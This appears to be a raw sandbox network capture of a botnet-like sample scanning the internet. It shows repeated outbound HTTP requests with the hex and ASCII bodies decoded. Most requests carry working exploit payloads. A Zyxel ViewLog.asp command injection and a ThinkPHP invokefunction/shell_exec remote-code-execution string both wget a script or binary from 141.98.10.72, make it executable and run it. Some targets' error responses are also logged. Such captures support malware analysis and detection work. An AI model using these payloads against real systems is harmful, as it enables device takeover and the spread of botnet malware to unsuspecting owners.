                                                            Feb 14, 2024 09:30:21.231657982 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:31.982126951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:54.251147032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            961192.168.2.235185862.29.103.1188080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.097204924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            962192.168.2.235994831.131.139.1028080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.111433029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:11.920916080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:12.184906006 CET334INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 08:30:12 GMT
                                                            Connection: Close
                                                            Cache-Control: no-store
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: DENY
                                                            Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *.ookla.com *.speedtest.net *.speedtestcustom.com


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            963192.168.2.2337432112.30.176.8680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.242003918 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            964192.168.2.234154895.101.227.15880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.437235117 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:11.632312059 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:30:11 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:11 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 37 63 38 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 31 26 23 34 36 3b 32 36 62 31 64 38 39 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;47c8645f&#46;1707899411&#46;26b1d891</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            965192.168.2.235525495.101.7.18080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.438612938 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:11.635565042 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:30:11 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:11 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 65 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 31 26 23 34 36 3b 32 36 36 66 30 35 32 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3eb0f748&#46;1707899411&#46;266f0520</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            966192.168.2.233368095.101.57.21480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.442812920 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:11.643872976 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:30:11 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:11 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 31 35 61 33 33 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 31 26 23 34 36 3b 34 32 31 33 33 61 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c15a33b8&#46;1707899411&#46;42133aa</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            967192.168.2.236033295.164.33.8480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.455725908 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:11.670782089 CET339INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:30:11 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            968192.168.2.233570694.185.112.1378080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.564645052 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:11.782335997 CET412INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 09:39:40 GMT
                                                            Server: Webs
                                                            X-Frame-Options: SAMEORIGIN
                                                            Cache-Control: no-cache
                                                            Content-Length: 166
                                                            Content-Type: text/html
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=180, max=99
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            969192.168.2.233874262.29.13.468080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.592386961 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            970192.168.2.235538094.190.225.2398080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.680221081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            971192.168.2.234964294.139.163.628080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.714832067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            972192.168.2.233737431.136.217.458080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.808540106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:14.832465887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:20.975637913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:33.005989075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:58.346568108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            973192.168.2.233333094.122.66.1588080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.852705956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            974192.168.2.235891894.120.175.818080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.852878094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            975192.168.2.234729895.100.0.6880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.853193998 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:12.269596100 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:30:12 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:12 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 63 37 32 32 63 33 31 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 32 26 23 34 36 3b 31 31 36 62 34 30 38 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
